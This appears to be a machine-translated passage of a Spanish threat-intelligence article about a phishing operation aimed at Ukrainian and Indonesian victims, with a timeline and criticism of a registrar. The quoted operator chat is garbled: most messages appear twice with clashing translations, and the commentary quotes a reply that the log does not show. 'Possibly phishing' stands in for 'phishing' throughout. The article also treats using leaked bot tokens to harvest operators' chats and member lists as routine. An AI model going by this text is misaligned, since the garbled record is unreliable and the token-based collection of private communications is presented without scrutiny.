Bueno, tampoco es que sea muy emocionante que te dejen sin fuerzas.Bueno, estar juntos tampoco es para tanto.
ME
MONETTI ESCOBAR25-03-2026 13:13:13
No va a hacer nadaNo va a hacer nada.
ME
MONETTI ESCOBAR25-03-2026 13:13:18
¿Qué va a hacer?¿Qué va a vender?
D
Devoys25-03-2026 13:13:26
qué es¿qué es esto?
ME
MONETTI ESCOBAR25-03-2026 13:13:34
Sí, se ha apuntado un chicoSí, se ha unido
D
Devoys25-03-2026 13:13:34
desde dónde¿de dónde?
B
Bonya25-03-2026 13:13:35
Aunque hayas iniciado sesión en la página de possibly phishing un par de veces desde tu propia IP, ya no mola.Aunque ya haya entrado un par de veces en Fish desde mi IP, ya no mola.
ME
MONETTI ESCOBAR25-03-2026 13:13:37
Al grupoAl grupo
ME
MONETTI ESCOBAR25-03-2026 13:13:38
XzNo sé
D
Devoys25-03-2026 13:13:39
cuando se utiliza la interpolacióncuando en la Interpol
D
Devoys25-03-2026 13:13:41
a lo cual¿a cuál?
ME
MONETTI ESCOBAR25-03-2026 13:13:44
Este de aquíEsta
B
Bonya25-03-2026 13:13:46
Solo he venido aquí a charlarEntra aquí en el chat
B
Bonya25-03-2026 13:13:49
Escribió queEscribió lo siguiente:
ME
MONETTI ESCOBAR25-03-2026 13:13:56
.
B
Bonya25-03-2026 13:13:57
Hola, solo tienes que guardar tus datos y esperar un minuto.
ME
MONETTI ESCOBAR25-03-2026 13:14:11
[Foto compartida]
D
Devoys25-03-2026 13:14:31
Ya los he visto antes.Ya he visto cosas así
B
Bonya25-03-2026 13:14:44
Bueno, a nosotros también nos han pillado con el bot de Ukr.Bueno, pues nos han dado una paliza en el bot de Ucrania.
B
Bonya25-03-2026 13:14:55
No has escrito nada en el chat.Hace tiempo que no escribían en el chat
B
Bonya25-03-2026 13:14:57
¿No escribiste tú¿O es que no lo escribieron?
ME
MONETTI ESCOBAR25-03-2026 13:15:04
Me importa una mierda.Y qué coño
B
Bonya25-03-2026 13:15:06
En nombre del canalEn nombre del canal
D
Devoys25-03-2026 13:15:23
Olvídate de eso de una vez.¡Que le den por culo!
ME
MONETTI ESCOBAR25-03-2026 13:15:31
Voy a acabar con este grupoVoy a eliminar este grupo
B
Bonya25-03-2026 13:15:35
+
D
Devoys25-03-2026 13:15:35
— Grupo eliminado por el propietario —

El grupo se eliminó en cuestión de minutos. El mensaje de despedida de Bonya —«+»— y la respuesta de Devoys, «sí», lo dicen todo: Sabían que estaban al descubierto, y su única opción era destruir las pruebas. Pero para entonces, los datos ya se habían recopilado.

Fíjate en el revelador comentario de Bonya: «También nos atacaron a través del bot ucraniano» — lo que confirma que ambos proyectos (el ucraniano y el indonesio) cuentan con el mismo equipo de operadores, y que no era la primera vez que su infraestructura se veía comprometida.

Sección 8: Qué demuestra esto

Cómo funciona THE ENABLERS REGISTRY

Todos los dominios que aparecen en enablers.report pasa por este proceso automatizado. [REDACTED][.]sbs no fue una excepción.

Detección
Análisis estático
Cartografía de infraestructuras
Descubrimiento del origen
OSINT
Generación de informes

Cronología de la investigación

20 de marzo de 2026
Dominio [REDACTED][.]sbs registrado a través de IANA #3858
21 de marzo de 2026
Detectado por el proceso de supervisión automatizado de THE ENABLERS REGISTRY
21 de marzo de 2026
Análisis totalmente automatizado completado: infraestructura mapeada, paquete JS desofuscado, protocolo WebSocket documentado
22 de marzo de 2026
Se ha identificado la dirección IP de origen. Se ha descubierto un segundo proyecto de possibly phishing («HealthCare ID») en el mismo servidor
22 de marzo de 2026
Al descubierto config.json permite identificar al operador a través de la API de [REDACTED] Bot
23 de marzo de 2026
Denuncias por abuso presentadas ante el proveedor de alojamiento, IANA #1910 y los CERT pertinentes
25 de marzo de 2026
Artículo publicado. Los informes sobre dominios ya están disponibles en THE ENABLERS REGISTRY

Cómo fue posible: la red de inteligencia de bots de THE ENABLERS REGISTRY

Esta investigación fue llevada a cabo íntegramente por sistemas automatizados. El proceso de THE ENABLERS REGISTRY no solo detecta dominios de possibly phishing, sino que se infiltra en la infraestructura de los operadores que hay detrás de ellos.

2,000+
Bots de [REDACTED] recopilados
Activo
Algunos bots siguen siendo objeto de seguimiento
Desde 2024
Recaudación en curso

Cuando los kits de possibly phishing revelan los tokens de los bots de [REDACTED] —como ocurrió con este a través de config.json — nuestro sistema los recopila automáticamente, asocia los grupos de operadores, extrae las listas de miembros y archiva los historiales de mensajes. Más de 2.000 bots Se han recopilado de esta forma desde 2024. Algunas siguen activas, y disfrutamos viendo cómo actúan los delincuentes en tiempo real, porque el final ya está escrito.

Incluso los usuarios que borran sus cuentas o eliminan sus grupos ya es demasiado tarde. Para cuando cunde el pánico, ya lo tenemos todo: archivos de mensajes, datos de perfil, pertenencia a grupos y bots conectados. Borrarlo no cambia nada. Los datos ya existían, y ahora están en nuestra base de datos.

«Espérame» — Edición «Estafador»

Este caso no es único: es un ejemplo de negligencia sistemática por parte de IANA #3765 que decidimos presentar como ejemplo de «megahackers». Como ha señalado acertadamente «Типичный Мошенник»: hay una diferencia entre los hackers y los estafadores — inteligencia. Estos operadores no son ni hackers ni personas inteligentes.

Los sistemas de THE ENABLERS REGISTRY recopilan automáticamente pruebas como esta en miles de dominios: recogen datos de bots, archivan las comunicaciones de los operadores y trazan mapas de la infraestructura. Este caso concreto era sencillamente demasiado absurdo como para no publicarlo. El kit de possibly phishing es de uso común, la seguridad operativa (OPSEC) brilla por su ausencia y los operadores borraron precipitadamente su grupo a los pocos minutos de ser descubiertos.

Estamos desarrollando un sistema que mostrará identidades de los operadores verificadas directamente en las páginas de informes de dominios — de estafador a víctima, como en el programa de televisión ruso «Жди Меня» (Espérame), pero al revés. Lleva funcionando en modo privado desde 2024. Ya se ha identificado a muchos operadores, incluidos aquellos que han borrado sus cuentas. Ahora mismo estamos decidiendo cuál es el más interesante forma de presentarlo. No te lo pierdas.

Dominios relacionados

Nuestro análisis identificó un segundo ámbito — hlpforvpeople[.]sbs — registrados a través del mismo registrador y con patrones de infraestructura coincidentes. Ambos dominios figuran en nuestra base de datos:

Incumplimiento por parte del registrador: IANA #3858

[REDACTED] (Hong Kong) ha recibido varios informes detallados sobre abusos de THE ENABLERS REGISTRY sobre ambos [REDACTED][.]sbs y hlpforvpeople[.]sbs. En el momento de la publicación — 5 días después del primer informe — No se ha tomado ninguna medida. Ambos dominios siguen funcionando con total normalidad.

No se trata de un caso aislado. IANA #3765 es un problema recurrente en nuestras investigaciones. La dirección de contacto para denunciar abusos del registrador (abuse@IANA #3765) se niega sistemáticamente a responder a las denuncias de possibly phishing, respaldadas por numerosas pruebas. A pesar de ser un registrador acreditado por la ICANN y sujeto al Acuerdo de Acreditación de Registradores (RAA, artículo 3.18), IANA #3765 opera con aparente impunidad.

IANA #3765 mantiene su presencia en ruso y comercializa .ru dominios a precios elevados (alrededor de 200 dólares), y se comunica con sus clientes a través de VK y [REDACTED], plataformas muy populares entre el público de habla rusa. El hecho de que su clientela coincida con la de las comunidades clandestinas plantea serias dudas sobre si la falta de respuesta del registrador ante las denuncias de abusos se debe a negligencia o a una estrategia comercial deliberada.

Esta investigación se publicó parcialmente debido a la prolongada inacción de IANA #3765. Cuando los registradores se niegan a tomar medidas ante los abusos relacionados con el possibly phishing, la denuncia pública se convierte en el único mecanismo de rendición de cuentas que queda.

Puntos clave

  • La automatización es la única forma de no quedarse atrás. Los kits de possibly phishing se implementan y se convierten en armas en cuestión de horas. La revisión manual no puede adaptarse a ese ritmo.
  • Los operadores cometen errores. Un archivo de configuración expuesto en un proyecto secundario desbarató toda una operación multinacional de possibly phishing. Es difícil mantener una seguridad operativa (OPSEC) perfecta en todos los proyectos.
  • La ingeniería social evoluciona al ritmo de la actualidad. La guerra, la ayuda humanitaria y los programas gubernamentales se utilizan cada vez más como señuelos para el possibly phishing, ya que se dirigen a personas en situación de angustia que son menos propensas a cuestionar su legitimidad.
  • La reutilización de infraestructuras es la norma. Un servidor, dos proyectos de possibly phishing, dos países, los mismos operadores. El análisis de las conexiones entre infraestructuras revela mucha más información que el análisis aislado de un único dominio.

Investigaciones relacionadas

Más investigaciones procedentes del canal de inteligencia automatizado de THE ENABLERS REGISTRY

Se ha revelado el panel de [REDACTED]
Una brecha de seguridad en el panel de administración pone al descubierto una operación de possibly phishing relacionada con las criptomonedas que abarca varios países y que incluye registros de chat de los operadores.
Se desvelan las redes de robo de criptomonedas
Análisis de la infraestructura que hay detrás de los kits de possibly phishing que vacían los monederos y tienen como objetivo a los usuarios de DeFi.
IANA #3765: un registrador que facilita la ciberdelincuencia
Cómo un registrador acreditado por la ICANN ignora sistemáticamente las denuncias de abuso, incluso en el marco de esta investigación.
[REDACTED] al descubierto: 10 años de claves robadas
Una estafa relacionada con una cartera de Monero que se prolongó durante una década ha salido a la luz gracias al análisis de JavaScript y al análisis forense de dominios.
Se desvela la infraestructura de una estafa
Alojamiento compartido, operadores compartidos: cómo las redes de possibly phishing reutilizan la infraestructura en sus distintas campañas.
[REDACTED] Drainer al descubierto
Estafa energética basada en TRON que vacía las carteras mediante aprobaciones maliciosas de contratos inteligentes.

Aviso legal: Esta investigación se llevó a cabo íntegramente mediante reconocimiento pasivo y API públicas. No se realizó ningún acceso no autorizado a ningún sistema. Las llamadas a la API del bot de [REDACTED] utilizaron un token que los operadores habían expuesto públicamente en un punto final sin autenticación. Todos los nombres de dominio que aparecen en este artículo se han ocultado según la convención estándar de seguridad de la información.

Comparte esta investigación

Investigaciones relacionadas

INVESTIGACIÓN EN PROFUNDIDAD
Análisis del possibly phishing de criptomonedas: 8 programas reales para robar frases de semillas, analizados mediante ingeniería inversa
INVESTIGACIÓN
Estafadores al descubierto: análisis detallado de cuatro sistemas de gestión de estafas
INVESTIGACIÓN
$0 Takedowns: How We Disrupt Possibly phishing Infrastructure

Continue browsing the ledger

This page is the editorial mirror. Brand names are redacted to public IANA / business identifiers. Use the index to navigate other case files.

Open registrar ledger → All briefings